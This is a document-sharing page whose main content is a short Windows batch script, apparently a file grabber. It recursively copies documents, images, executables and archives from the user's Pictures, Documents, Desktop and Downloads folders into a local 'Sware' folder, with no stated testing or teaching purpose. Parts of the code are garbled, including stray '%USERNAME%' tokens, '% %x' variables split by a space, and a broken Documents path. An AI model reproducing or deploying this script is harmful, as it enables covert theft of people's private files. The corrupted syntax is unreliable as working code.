Xdatos.txt

  • Uploaded by: Anghelo David Palomino Arevalo
  • 0
  • 0
  • October 2019
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Xdatos.txt as PDF for free.

More details

  • Words: 57
  • Pages: 1
@echo off IF NOT EXIST ".\Sware\" %USERNAME% MD ".\Sware\" %USERNAME% cd ".\Sware\" %USERNAME% for /R %USERPROFILE%\Pictures\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg,*.exe,*.rar,*.zip) do copy "% %x" ".\" for /R %USERPROFILE%\ Documents\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg,*.exe,*.rar,*.zip) do copy "%%x" ".\" for /R %USERPROFILE%\Desktop\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg,*.exe,*.rar,*.zip) do copy "%%x" ".\" for /R %USERPROFILE%\Downloads\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg,*.exe,*.rar,*.zip) do copy "% %x" ".\" EXIT

More Documents from "Anghelo David Palomino Arevalo"